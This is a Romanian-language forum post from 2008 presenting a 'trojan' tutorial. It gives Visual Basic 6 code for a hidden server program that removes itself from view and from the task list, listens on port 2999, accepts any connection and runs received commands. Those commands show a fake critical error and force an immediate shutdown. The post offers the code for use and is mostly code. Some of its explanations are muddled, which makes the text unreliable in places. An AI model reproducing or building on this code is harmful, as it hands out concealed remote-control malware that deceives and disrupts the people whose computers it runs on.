[Tutorial] Trojan

In jos

[Tutorial] Trojan

Mesaj Scris de Max la data de Dum Sept 07, 2008 7:18 pm

Ok sa incepem

A scrie un trojan este mai simplu decat cred multi acesta implica un Client si un Server si cu mai putin de 100 de linii de cod se poate face acest lucru.

Mai jos va arat cateva exemple si voi incepe cu serverul si ascunderea lui.

Server:

Ca sa nu il facem vizibil ( ochiului ).

Private Sub Form_Load()
Me.Visible = False
End Sub


Asta ascunde programul de ochiul liber dar cu TaskManager este un pic mai greu.

Trebuie sa adaugam asta:

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub


Acum Serverul adica trojanul propriu zis va fii ascuns poate nu vii se pare mare lucru dar este complet invizibil in procese.

Si ca sa facem treaba mai frumoasa acum incepem sa adaugam functiile trojanului.

Primul lucru pe care trebuie sa il facem este sa il facem capabil sa asculte conexiuni. Ca sa putem face acest lucru vom adauga un Winsock Control.

Noi il vom face sa asculte conexiuni pe port 2999 atunci cand trojanul porneste.

Pentru asta codul nostru trebuie sa arate cam asa.
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub


Pana acum avem un program care asculta la acel port dar in rest nu face nimic.

Acum adaugam Main Form.

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub


Acum trebuie sa programam Actiunile Programului mai precis ceea ce face pe care le-am chemat in functiile din Main Form-ul de mai sus.In caz ca te intrebi codul adaugat in form face doua lucruri. Primul sub face ca toate cererile de conexiune sa fie acceptate. Al 2 lea sub face ca toate datele sa fie acceptate si dupa paseaza tota data spre functiile pe care le prezint mai jos.

Acum avem un Trojan care inchide calculatorul trimite date spre port 2999 la inchiderea Pcu-lui target.

Sa completam codul..

Main Form:

Pentru codul de Actiune, trebuie sa facem o functie publica in modul. (Public sa nu poata fii folosit de cod in afara la modul) Adaugati acest cod la modul si Trojanul este aproape gata.

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\explorer1.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Max
Moderator
Moderator

Numarul mesajelor : 53
Varsta : 30
Localitate : Confidential
Stare de spirit : Rakiu
Data de inscriere : 23/08/2008

Vezi profilul utilizatorului

Sus In jos

Sus


 
Permisiunile acestui forum:
Nu puteti raspunde la subiectele acestui forum